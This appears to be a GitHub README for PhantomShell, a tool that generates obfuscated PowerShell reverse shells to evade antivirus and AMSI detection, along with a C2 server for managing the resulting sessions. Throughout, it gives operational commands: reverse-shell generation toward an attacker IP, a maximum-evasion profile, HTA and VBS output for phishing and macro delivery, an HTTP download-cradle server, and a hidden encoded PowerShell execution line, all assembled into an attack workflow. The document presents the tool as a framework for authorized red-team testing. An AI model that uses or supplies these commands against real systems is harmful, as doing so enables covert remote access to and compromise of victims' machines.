👻 PhantomShell

Advanced PowerShell AV / AMSI Evasion Framework + Enterprise C2 Server

Red-team framework designed for authorized penetration testing and adversary simulation.

PhantomShell combines an advanced PowerShell payload generator with a lightweight Command & Control (C2) infrastructure, enabling red-team operators to generate payloads, host them, and manage reverse shell sessions.

---

👻 What is PhantomShell?

PhantomShell generates obfuscated, base64-encoded PowerShell reverse shells designed to evade signature-based antivirus detection and AMSI scanning.

It automates tasks such as:

• variable obfuscation
• payload encoding
• multi-layer execution wrapping
• hiding IP and port values
• HTTP payload delivery
• polymorphic payload generation

All from one command-line tool.

---

🔍 Is PhantomShell Undetectable?

No tool can guarantee that.

PhantomShell helps evade signature-based detection, but it cannot bypass every defensive mechanism.

Technique	What it helps evade	What it cannot evade
Variable renaming	static signatures	behavioral detection
Base64 encoding	plain-text scanning	runtime AMSI
Multi-layer wrapping	shallow analysis	deep sandboxing
IP hiding	simple pattern matching	network monitoring
Polymorphism	hash detection	AI behavioral EDR

Best evasion profile:

--obf-profile random
--layers 3
--enc-b64

---

🚀 Features

⚡ Payload Generation

• multi-layer PowerShell encoding
• AMSI-aware payload structure
• polymorphic payload generation
• randomized variable names
• multiple delivery formats

🎮 Command & Control

• lightweight Python C2 server
• CLI operator shell
• web dashboard
• multi-session handling
• remote command execution

🎯 Red Team Usage

• reverse shell generation
• HTTP payload hosting
• polymorphic payload variants
• session monitoring

---

🏗 Architecture

Target Machine
      │
      │ Reverse Shell
      ▼
PhantomShell C2 Server
      │
      ├── CLI Interface
      │
      └── Web Dashboard

---

⚙ Installation

No external dependencies.

git clone https://github.com/adrilaw/PhantomShell.git

cd PhantomShell

chmod +x phantomshell.py

chmod +x phantomc2.py

python3 phantomc2.py --help

python3 phantomshell.py --help

---

🚀 Quick Start

Terminal 1 — Start C2 server

python3 phantomc2.py --port 4444 --web-port 8080 --password RedTeam2026

For more information on the Phantom C2 use the command below

python3 phantomc2.py --port 4444 --help

---

Terminal 2 — Generate payload

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444

Run the generated command on the Windows target.

Shell connects back to Terminal 1.

---

💾 Payload Generating Command Reference

Terminal 2 — Generate Payload

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444

Copy the output and run it on the target Windows machine.

---

📖 Command Reference

revshell — Standalone Payload

python3 phantomshell.py revshell -i <IP> -p <PORT> [OPTIONS]

Flag	Short	Description	Default
--attacker-ip	-i	attacker IP	required
--port	-p	listening port	required
--obf-profile	-o	minimal/aggressive/random	aggressive
--layers	-l	encoding layers	1
--format	-f	payload format	powershell
--enc-b64		hide IP and port	off
--keep-pwd		show CWD	off
--do-not-hide		disable hidden flags	off
--verbose	-v	verbose output	off

---

Examples

Basic payload

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444

Maximum evasion

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -o random -l 3 --enc-b64

HTA payload

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f hta -l 2

CMD wrapper

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f cmd

Verbose mode

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -v

---

🌐 server — HTTP Payload Hosting

Starts an HTTP server and prints a download cradle.

python3 phantomshell.py server -i <IP> -p <PORT>

Flag	Description	Default
-i	attacker IP	required
-p	reverse shell port	required
--server-port	HTTP port	8000
-o	payload filename	random
--layers	encoding layers	1
--enc-b64	hide IP/port	off

---

Example:

python3 phantomshell.py server -i 10.10.10.5 -p 4444

Target execution:

powershell -NoP -sta -NonI -W Hidden -enc <CRADLE>

---

🔄 polymorph — Polymorphic Payload Generator

Generate multiple unique payload variants.

python3 phantomshell.py polymorph -i <IP> -p <PORT>

Example:

python3 phantomshell.py polymorph -i 10.10.10.5 -p 4444 -n 5

Output example

Variant 1 profile=minimal FP:B0CCA4CD
Variant 2 profile=aggressive FP:06F530B1
Variant 3 profile=random FP:A273D56F

---

🎯 Obfuscation Profiles

minimal

$client → $c
$stream → $st
$bytes → $b

Fast and readable.

---

aggressive

$client → $xA1
$stream → $xB2
$bytes → $xC3

Default profile.

---

random

$client → $mKpRx
$stream → $zQ6v8A6
$bytes → $hySOJ

Different every run.

---

🧅 Encoding Layers

Layer	Description
1	utf-16le base64
2	base64 wrapped in IEX
3	multi-stage base64 decoding

Payload is verified before output.

---

📦 Output Formats

Format	Usage
powershell	direct execution
cmd	cmd injection
hta	phishing
vbs	macro delivery
mshta	one-liner execution

---

🎯 Example Attack Workflow

# Listener
python3 phantomc2.py --port 4444 --web-port 8080 --password RedTeam2026

# Generate payload
python3 phantomshell.py server -i 10.10.10.5 -p 4444 -l 2

# Execute on target
powershell -NoP -sta -NonI -W Hidden -enc <payload>

---

🛡 Security Considerations

Use only in authorized environments.

Recommended:

• firewall restrictions
• HTTPS proxy
• strong authentication
• infrastructure rotation
• log monitoring

---

⚠ Legal Disclaimer

This software is intended only for authorized cybersecurity testing.

Unauthorized use may violate computer crime laws.

The author assumes no liability for misuse.

---

📝 License

PhantomShell is licensed under the GNU General Public License and the PhantomShell Commercial License- see the LICENSE file for details.

👨‍💻 Author

Dodin Mel Adrien Lawrence Enzo

Offensive Security | Red Teaming

LinkedIn
https://www.linkedin.com/in/dodin-mel-adrien-lawrence-enzo-5568b91b5/

Twitter
https://twitter.com/AdrienDodin

---

⭐ If this project helped you, consider starring the repository.